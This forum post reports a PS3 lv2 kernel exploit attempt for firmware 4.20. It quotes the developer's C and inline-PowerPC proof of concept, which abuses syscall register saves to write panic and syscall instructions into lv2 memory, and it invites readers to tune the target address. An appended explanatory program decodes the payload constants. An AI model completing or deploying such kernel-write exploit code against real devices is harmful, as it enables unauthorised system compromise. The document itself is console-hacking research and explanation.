Hello, after the publication of naehrwert's possible lv2 exploit, KDSBest has found another one, which according to him he has been able to run up to firmware 4.20:
Another lv2 exploit has been published, this time from German dev KDSBest. He claims he did not get it to work on firmware 4.21, so he did it on 4.20. If you don't know what lv2 is, you can read up on it on the ps3devwiki.
Since @naehrwert posted an lv2 exploit I will do so too. The stack pointer points to lv2 and if we do a syscall, the syscall saves registers to the stack HAHA. Btw. it just crashes the console for now, since I totally overwrite/dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stack pointer and so on. If you manage to get the panic payload executed, tell me!!! ^^
// compile: ppu-gcc kds2.c -o kds2.elf
// or:      ppu-lv2-gcc kds2.c -o kds2.elf

// Global register variables: these are pinned to fixed GPRs so that their
// values are still in place when the syscall handler saves registers to the stack.
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");

int __volatile__ main(int argc, const char* argv[])
{
    // backup stack pointer
    bufferStackpointer = stackpointer;
    // two copies of "li r11, 0x24F" (PANIC) in one 64-bit register
    payloadHolder = 0x3960024F3960024FUL;
    // two copies of "sc" in one 64-bit register
    payloadHolder2 = 0x4400000244000002UL;
    // incrementer
    counter = 0x00;
    // Play with that address till the panic is executed, I lack the time to do so.
    // Always add 2 or 4 to it, I would try 4 or 8... bla bla, you will get the idea.
    stackpointer = 0x8000000000000100UL;

doItAgain:
    // KDSBest payload
    // prepare for our syscall
    asm("li %r0, 0x0");
    asm("li %r3, 0x6");
    asm("li %r4, 0x1");
    // fill the non-volatile registers with "li r11, 0x24F" -> PANIC
    asm("mr %r22, %r20");
    asm("mr %r23, %r20");
    asm("mr %r24, %r20");
    asm("mr %r27, %r20");
    asm("mr %r28, %r20");
    asm("mr %r29, %r20");
    asm("mr %r30, %r20");
    asm("mr %r31, %r20");
    // stack pointer = build address of lv2 (advanced by the current counter value)
    stackpointer += counter;
    // syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;
    // now we write "sc"
    asm("mr %r22, %r21");
    asm("mr %r23, %r21");
    asm("mr %r24, %r21");
    asm("mr %r27, %r21");
    asm("mr %r28, %r21");
    asm("mr %r29, %r21");
    asm("mr %r30, %r21");
    asm("mr %r31, %r21");
    // stack pointer = build address of lv2 (advanced by the current counter value)
    stackpointer += counter;
    // syscall 0xA9
    asm("li %r11, 0xA9");
    asm("sc");
    counter += 0x04;
    if (counter < 0x1000000)
        goto doItAgain;
    // restore the real stack pointer before returning
    stackpointer = bufferStackpointer;
    return 0;
}
I didn't manage to make it work on 4.21 so I just did it on 4.20.
http://www.ps3hax.net/2012/09/another-l ... m-kdsbest/
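The two magic constants in the post, 0x3960024F3960024F and 0x4400000244000002, are each a 64-bit register holding two copies of one PowerPC instruction, so that a single 8-byte register save lays down two executable words. The following is an added example, not code from KDSBest or the ps3hax post: it encodes `li r11, 0x24F` and `sc` from the PowerPC D-form and SC-form bit layouts, checks that they match the post's constants, and spills them into a constructed byte buffer with a tiny decoder to show what the saved registers look like in memory. The big-endian store order is the PS3's PPU byte order; the 16-byte buffer and the back-to-back placement of the two registers are an illustration only, since the post does not document the real layout of lv2's register save area.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The two payload constants exactly as they appear in the post. */
static const uint64_t POST_LI_PAIR = 0x3960024F3960024FULL;
static const uint64_t POST_SC_PAIR = 0x4400000244000002ULL;

/* `li rD, SIMM` is `addi rD, r0, SIMM`: primary opcode 14, rA = 0. */
static uint32_t ppc_li(unsigned rd, int16_t simm)
{
    return (14u << 26) | ((rd & 31u) << 21) | (uint32_t)(uint16_t)simm;
}

/* `sc`: primary opcode 17 with bit 30 set, which encodes to 0x44000002. */
static uint32_t ppc_sc(void)
{
    return (17u << 26) | 2u;
}

/* Two copies of one instruction in a 64-bit GPR: one 8-byte store of that
   register (which is what a register save does) writes two identical words. */
static uint64_t pack_twice(uint32_t insn)
{
    return ((uint64_t)insn << 32) | insn;
}

/* PPU is big-endian, so the high word of the register lands at the lower address. */
static void store64_be(uint8_t *dst, uint64_t v)
{
    for (int i = 7; i >= 0; i--) { dst[i] = (uint8_t)v; v >>= 8; }
}

static uint32_t load32_be(const uint8_t *src)
{
    return ((uint32_t)src[0] << 24) | ((uint32_t)src[1] << 16) |
           ((uint32_t)src[2] << 8) | src[3];
}

/* Minimal decoder for the two forms used by the payload; returns 1 if recognised. */
static int ppc_disasm(uint32_t insn, char *out, size_t outlen)
{
    unsigned opcd = insn >> 26;
    if (opcd == 14 && ((insn >> 16) & 31u) == 0) {
        snprintf(out, outlen, "li r%u, 0x%X", (insn >> 21) & 31u, insn & 0xFFFFu);
        return 1;
    }
    if (insn == ppc_sc()) {
        snprintf(out, outlen, "sc");
        return 1;
    }
    snprintf(out, outlen, ".long 0x%08X", insn);
    return 0;
}

/* Constructed 16-byte "save area": the li-pair register spilled at offset 0
   and the sc-pair register spilled right after it. Returns word idx (0..3). */
static uint32_t spilled_word(unsigned idx)
{
    uint8_t mem[16];
    store64_be(mem, POST_LI_PAIR);
    store64_be(mem + 8, POST_SC_PAIR);
    return load32_be(mem + 4 * (idx & 3u));
}

static int spilled_word_is(unsigned idx, const char *mnemonic)
{
    char buf[32];
    ppc_disasm(spilled_word(idx), buf, sizeof buf);
    return strcmp(buf, mnemonic) == 0;
}

int main(void)
{
    char buf[32];
    printf("li r11,0x24F encodes to 0x%08X (post: 0x%08X)\n",
           ppc_li(11, 0x24F), (uint32_t)(POST_LI_PAIR >> 32));
    printf("sc           encodes to 0x%08X (post: 0x%08X)\n",
           ppc_sc(), (uint32_t)(POST_SC_PAIR >> 32));
    for (unsigned i = 0; i < 4; i++) {
        ppc_disasm(spilled_word(i), buf, sizeof buf);
        printf("+0x%02X: %08X  %s\n", 4 * i, spilled_word(i), buf);
    }
    return 0;
}
```

Doubling the instruction inside each register is what lets a register-save primitive that writes whole 64-bit GPRs produce 4-byte-aligned code words regardless of which half of the save slot the target fetches from; the post's loop then tries to line up a `li r11, 0x24F` save slot immediately before an `sc` save slot by re-running the syscall with the stack pointer nudged by 4.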